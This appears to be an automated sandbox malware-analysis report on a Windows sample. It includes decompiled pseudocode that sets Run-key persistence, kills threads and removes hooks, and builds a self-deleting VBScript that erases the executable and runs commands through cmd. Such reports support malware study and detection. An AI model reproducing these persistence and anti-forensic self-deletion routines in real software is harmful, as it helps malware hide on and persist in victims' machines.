                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                        • API String ID: 1819783940-1536747724
                                        • Opcode ID: 7814478d81375f36d2fa1a1643ff22bfee750f7fbdb2a6f4e976380ae596cf00
                                        • Instruction ID: 422d0979f444bffee83793bc3d795cbcdb9f6e23a9fd2fc637ca2dc4c5c01907
                                        • Opcode Fuzzy Hash: 7814478d81375f36d2fa1a1643ff22bfee750f7fbdb2a6f4e976380ae596cf00
                                        • Instruction Fuzzy Hash: 7DB15FB2800509EBCB04EBE0ED4D9EE777CEF94345B54407AF902A3191DF795A48CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00408245, Relevance: 110.5, APIs: 49, Strings: 14, Instructions: 260registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 19%
                                        			E00408245() {
				char _v0;
				signed int _v5;
				char _v6;
				signed int _v9;
				char _v10;
				char _v24;
				char _v28;
				char _v40;
				char _v44;
				char _v56;
				char _v60;
				char _v72;
				char _v76;
				char _v88;
				char _v92;
				void* _v108;
				void* _v124;
				void _v606;
				short _v608;
				short _v644;
				void* _t112;
				void* _t114;
				char* _t116;
				WCHAR* _t118;
				signed char _t120;
				char* _t121;
				char* _t123;
				char* _t126;
				char* _t127;
				char* _t128;
				short* _t131;
				void* _t132;
				char* _t134;
				WCHAR* _t137;
				char* _t138;
				char* _t140;
				char* _t143;
				char* _t144;
				char* _t145;
				char* _t146;
				signed int* _t148;
				char* _t149;
				char* _t150;
				signed int _t151;
				short* _t153;
				char* _t154;
				char* _t155;
				WCHAR* _t157;
				char* _t158;
				char* _t159;
				char* _t163;
				WCHAR* _t165;
				char* _t166;
				char* _t167;
				intOrPtr* _t174;
				short* _t285;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t308;
				void* _t310;

				_t112 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t112 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t112 = E0041050F(_t112);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E00412BEE(_t112);
				}
				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000002, _t172, _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				_v608 = _v608 & 0x00000000;
				_t114 = memset( &_v606, 0, 0x81 << 2);
				asm("stosw");
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
				_t299 = _t297 + 0x28;
				if(_t116 == 0) {
					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t116);
				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
				_v5 = 1;
				_t118 =  *_t174(0x41bc68, 0x415800);
				if(_t118 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t118, 0x80);
				}
				_t120 = SetFileAttributesW( &_v608, 0x80);
				if(_t120 == 0) {
					_v5 = _v5 & _t120;
				}
				_t121 =  &_v6;
				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
				_t123 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
				L0041416A();
				_t301 = _t299 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
				if(_v5 != 0) {
					_t165 =  &_v608;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
					_t166 =  &_v72;
					L0041416A();
					_t167 =  &_v40;
					L00414146();
					_t301 = _t301 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t126 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
				_t127 =  &_v72;
				L00414146();
				_t128 =  &_v56;
				L00414146();
				_t303 = _t301 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				_push(0x415800);
				_push(0x41bc68);
				if( *_t174() != 0) {
					_t163 =  &_v72;
					L0041416A();
					_t129 =  &_v56;
					L00414146();
					_t303 = _t303 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
				_t304 = _t303 + 0x10;
				if(_t131 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
				}
				exit(0);
				_pop(_t280);
				_pop(_t291);
				_pop(_t175);
				_t305 = _t304 - 0x27c;
				_t132 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t132 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t132 = E0041050F(_t132);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E00412BEE(_t132);
				}
				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, _t176, _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
				_t306 = _t305 + 0x1c;
				if(_t134 == 0) {
					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t134);
				_v9 = 1;
				_t137 = SetFileAttributesW( &_v644, 0x80);
				if(_t137 == 0) {
					_v9 = _v9 & _t137;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t137 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t137, 0x80);
				}
				_t138 =  &_v10;
				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
				_t140 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
				L0041416A();
				_t308 = _t306 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
				if(_v9 != 0) {
					_t157 =  &_v644;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
					_t158 =  &_v76;
					L0041416A();
					_t159 =  &_v28;
					L00414146();
					_t308 = _t308 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t285 = L"\"\n";
				_t143 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
				_t144 =  &_v76;
				L00414146();
				_t145 =  &_v60;
				L00414146();
				_t310 = _t308 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v9 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t145 != 0) {
					_t154 =  &_v76;
					L0041416A();
					_t155 =  &_v60;
					L00414146();
					_t310 = _t310 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t146 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
				_t148 =  &_v9;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
				_t149 =  &_v28;
				L0041414C();
				_t150 =  &_v76;
				L0041414C();
				_t151 =  &_v60;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
				if(_t153 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
					if(_t153 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t153;
			}




































































                                        0x0040824e
                                        0x0040825a
                                        0x00408261
                                        0x00408261
                                        0x0040826d
                                        0x0040826f
                                        0x0040826f
                                        0x0040827b
                                        0x00408282
                                        0x00408289
                                        0x0040828e
                                        0x0040829e
                                        0x004082a8
                                        0x004082ac
                                        0x004082b5
                                        0x004082ba
                                        0x004082ba
                                        0x004082c4
                                        0x004082c8
                                        0x004082d5
                                        0x004082da
                                        0x004082da
                                        0x004082e4
                                        0x004082e8
                                        0x004082f9
                                        0x004082fe
                                        0x004082fe
                                        0x00408301
                                        0x00408316
                                        0x00408318
                                        0x00408321
                                        0x0040832a
                                        0x0040834a
                                        0x00408352
                                        0x00408357
                                        0x0040835c
                                        0x00408368
                                        0x00408368
                                        0x00408370
                                        0x00408378
                                        0x0040837e
                                        0x00408390
                                        0x00408394
                                        0x0040839a
                                        0x004083a6
                                        0x004083ad
                                        0x004083ad
                                        0x004083bf
                                        0x004083c7
                                        0x004083c9
                                        0x004083c9
                                        0x004083cc
                                        0x004083da
                                        0x004083e5
                                        0x004083f0
                                        0x004083fb
                                        0x00408401
                                        0x0040840d
                                        0x0040841d
                                        0x00408422
                                        0x00408428
                                        0x00408432
                                        0x0040843d
                                        0x00408447
                                        0x0040844e
                                        0x00408457
                                        0x00408460
                                        0x00408464
                                        0x00408469
                                        0x00408470
                                        0x00408479
                                        0x00408482
                                        0x0040848b
                                        0x0040848b
                                        0x0040849d
                                        0x004084a9
                                        0x004084b0
                                        0x004084b4
                                        0x004084bd
                                        0x004084c1
                                        0x004084c6
                                        0x004084cd
                                        0x004084d6
                                        0x004084df
                                        0x004084e8
                                        0x004084f2
                                        0x004084fc
                                        0x004084fc
                                        0x00408502
                                        0x00408503
                                        0x0040850a
                                        0x00408512
                                        0x0040851b
                                        0x00408524
                                        0x00408528
                                        0x0040852d
                                        0x00408534
                                        0x0040853d
                                        0x00408546
                                        0x00408546
                                        0x00408554
                                        0x00408560
                                        0x0040856a
                                        0x00408576
                                        0x0040857d
                                        0x00408582
                                        0x00408587
                                        0x0040858f
                                        0x0040859c
                                        0x0040859c
                                        0x004085a3
                                        0x004085a9
                                        0x004085aa
                                        0x004085ab
                                        0x004085af
                                        0x004085b5
                                        0x004085c1
                                        0x004085c8
                                        0x004085c8
                                        0x004085d4
                                        0x004085d6
                                        0x004085d6
                                        0x004085e2
                                        0x004085e9
                                        0x004085f0
                                        0x004085f5
                                        0x00408605
                                        0x0040860f
                                        0x00408613
                                        0x0040861c
                                        0x00408621
                                        0x00408621
                                        0x0040862b
                                        0x0040862f
                                        0x0040863c
                                        0x00408641
                                        0x00408641
                                        0x0040864b
                                        0x0040864f
                                        0x00408660
                                        0x00408665
                                        0x00408665
                                        0x0040866f
                                        0x00408678
                                        0x00408698
                                        0x004086a0
                                        0x004086a5
                                        0x004086aa
                                        0x004086b6
                                        0x004086b6
                                        0x004086be
                                        0x004086c6
                                        0x004086df
                                        0x004086e3
                                        0x004086e7
                                        0x004086e9
                                        0x004086e9
                                        0x004086f7
                                        0x00408701
                                        0x00408709
                                        0x00408710
                                        0x00408710
                                        0x00408712
                                        0x00408720
                                        0x0040872b
                                        0x00408736
                                        0x00408741
                                        0x00408747
                                        0x00408753
                                        0x00408763
                                        0x00408768
                                        0x0040876e
                                        0x00408778
                                        0x00408783
                                        0x0040878d
                                        0x00408794
                                        0x0040879d
                                        0x004087a6
                                        0x004087aa
                                        0x004087af
                                        0x004087b6
                                        0x004087bf
                                        0x004087c8
                                        0x004087d1
                                        0x004087d1
                                        0x004087d7
                                        0x004087e4
                                        0x004087f0
                                        0x004087f7
                                        0x004087fb
                                        0x00408804
                                        0x00408808
                                        0x0040880d
                                        0x00408814
                                        0x0040881d
                                        0x00408826
                                        0x0040882f
                                        0x00408839
                                        0x00408843
                                        0x00408843
                                        0x00408850
                                        0x0040885a
                                        0x0040885e
                                        0x00408867
                                        0x00408870
                                        0x00408874
                                        0x00408879
                                        0x00408880
                                        0x00408889
                                        0x00408892
                                        0x00408892
                                        0x00408898
                                        0x004088a9
                                        0x004088b4
                                        0x004088c0
                                        0x004088c7
                                        0x004088cb
                                        0x004088d4
                                        0x004088d8
                                        0x004088e1
                                        0x004088e5
                                        0x004088f1
                                        0x004088fa
                                        0x00408903
                                        0x0040890c
                                        0x00408915
                                        0x0040891e
                                        0x0040892c
                                        0x00408938
                                        0x00408942
                                        0x0040894e
                                        0x00408955
                                        0x0040895f
                                        0x00408967
                                        0x00408974
                                        0x0040897d
                                        0x00408980
                                        0x00408980
                                        0x0040897d
                                        0x00408989
                                        0x00408992
                                        0x0040899b
                                        0x004089a5

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                          • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                        • _wgetenv.MSVCRT ref: 004083DA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
